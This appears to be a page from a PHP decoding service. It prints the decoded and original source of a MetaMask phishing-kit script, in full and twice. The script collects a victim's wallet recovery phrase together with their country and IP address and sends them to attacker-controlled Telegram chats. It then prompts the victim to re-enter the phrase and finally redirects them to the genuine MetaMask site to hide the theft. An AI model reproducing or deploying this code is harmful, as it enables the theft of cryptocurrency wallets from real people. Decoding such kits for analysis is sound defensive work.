Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php include "../RouterInc.php"; $data_info = @json_decode(file_get_contents("php:/..

Decoded Output download

<?php 
 
include "../RouterInc.php"; 
 
$data_info = @json_decode(file_get_contents("php://input"),true); 
 
class RzM3WIrA60IfseNM7DpArIxcvVWP1gKeSZEEoKfunrFAlHFUKdNdcAUwdyMEKj0iTmjuqyGY 
{ 
    static $data = "---------------------------"; 
    static $name = "+ " . Application . " +"; 
     
    static $message; 
 
    public static function XEVEawkffIjVDhomjRX9oCAicKSr83QcreAazzK041gtlK($func) 
    { 
 
        global $mix_telegram; 
        global $card_info; 
        global $data_info; 
         
        self::$message = "" . self::$data . self::$name . self::$data . "
"; 
 
        self::$message .= "
  +   " . ((int)$data_info["len"] - 1) . " Keys  :   " . str_replace("  "," ",strtolower($data_info['keys'])) . " 
"; 
        self::$message .= "
" . self::$data . self::$name . self::$data . "
"; 
        self::$message .= " 
   Country : {$func->country()}  
"; 
        self::$message .= "      IP Address : {$func->get_user_ip()}  
"; 
        self::$message .= "
" . self::$data . self::$name . self::$data . "
"; 
 
 
        if (!isset($_SESSION["location"])) 
        { 
            $_SESSION["location"] = 1; 
        } 
        else 
        { 
            $_SESSION["location"] += 1; 
        } 
             
         
        foreach($mix_telegram as $chatid => $token) 
        { 
 
            $func->send_telegram($chatid,self::$message,$token); 
     
        } 
         
    } 
} 
 
function containsNumbers($string) { 
    return preg_match('/\d/', $string) === 1; 
} 
 
 
if(is_array($data_info)) 
{ 
    if (containsNumbers($data_info['keys'])) 
    { 
        echo '{"location" : "import-with-recovery-phrasex"}'; 
        exit(); 
    } 
     
    RzM3WIrA60IfseNM7DpArIxcvVWP1gKeSZEEoKfunrFAlHFUKdNdcAUwdyMEKj0iTmjuqyGY::XEVEawkffIjVDhomjRX9oCAicKSr83QcreAazzK041gtlK($func); 
     
     
         
    if(isset($_SESSION["location"])) 
    { 
        if ($_SESSION["location"] == 1) 
        { 
            echo '{"location" : "import-with-recovery-phrase"}'; 
            exit(); 
        } 
        else 
        { 
            echo '{"location" : "https://metamask.io/about/"}'; 
            unset($_SESSION["location"]); 
            exit(); 
        } 
         
    } 
} 
 ?>

Did this file decode correctly?

Original Code

<?php

include "../RouterInc.php";

$data_info = @json_decode(file_get_contents("php://input"),true);

class RzM3WIrA60IfseNM7DpArIxcvVWP1gKeSZEEoKfunrFAlHFUKdNdcAUwdyMEKj0iTmjuqyGY
{
    static $data = "---------------------------";
    static $name = "+ " . Application . " +";
    
    static $message;

    public static function XEVEawkffIjVDhomjRX9oCAicKSr83QcreAazzK041gtlK($func)
    {

        global $mix_telegram;
        global $card_info;
        global $data_info;
        
        self::$message = "" . self::$data . self::$name . self::$data . "\r\n";

        self::$message .= "\n  +   " . ((int)$data_info["len"] - 1) . " Keys  :   " . str_replace("  "," ",strtolower($data_info['keys'])) . " \r\n";
        self::$message .= "\r\n" . self::$data . self::$name . self::$data . "\r\n";
        self::$message .= " \n   Country : {$func->country()}  \r\n";
        self::$message .= "      IP Address : {$func->get_user_ip()}  \r\n";
        self::$message .= "\r\n" . self::$data . self::$name . self::$data . "\r\n";


        if (!isset($_SESSION["location"]))
        {
            $_SESSION["location"] = 1;
        }
        else
        {
            $_SESSION["location"] += 1;
        }
            
        
        foreach($mix_telegram as $chatid => $token)
        {

            $func->send_telegram($chatid,self::$message,$token);
    
        }
        
    }
}

function containsNumbers($string) {
    return preg_match('/\d/', $string) === 1;
}


if(is_array($data_info))
{
    if (containsNumbers($data_info['keys']))
    {
        echo '{"location" : "import-with-recovery-phrasex"}';
        exit();
    }
    
    RzM3WIrA60IfseNM7DpArIxcvVWP1gKeSZEEoKfunrFAlHFUKdNdcAUwdyMEKj0iTmjuqyGY::XEVEawkffIjVDhomjRX9oCAicKSr83QcreAazzK041gtlK($func);
    
    
        
    if(isset($_SESSION["location"]))
    {
        if ($_SESSION["location"] == 1)
        {
            echo '{"location" : "import-with-recovery-phrase"}';
            exit();
        }
        else
        {
            echo '{"location" : "https://metamask.io/about/"}';
            unset($_SESSION["location"]);
            exit();
        }
        
    }
}

Function Calls

None

Variables

None

Stats

MD5 4e28fe44df67a8ae7c2ead2ecad00959
Eval Count 0
Decode Time 40 ms